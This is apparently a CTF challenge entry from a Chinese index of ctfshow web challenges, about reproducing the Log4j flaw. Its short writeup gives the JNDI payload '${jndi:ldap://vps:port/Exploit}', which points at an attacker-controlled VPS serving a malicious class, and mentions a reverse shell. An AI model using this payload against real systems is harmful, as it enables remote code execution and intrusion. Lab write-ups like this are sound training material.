Log4j复现
| ID: | 4485 |
|---|---|
| 标题: | Log4j复现 |
| 描述: | Log4j复现,师傅们别到处RCE了 资源占用大,启动较慢。 |
| 类型: | WEB |
| 网站: | ctfshow |
| 题目链接: | https://ctf.show/api/v1/challenges/1730 |
| 赛事: | None |
| 年度: | None |
| Flag值: | 题目答案文本 |
| writeup: |
验证后的网址 使用DNSLOG验证漏洞存在性,构造payload ${jndi:ldap://vps:port/Exploit},通过VPS部署LDAP服务器和恶意class文件实现RCE,最终反弹shell获取flag文件内容 2 7 https://ctf.show/challenges#Log4j复现-1730 |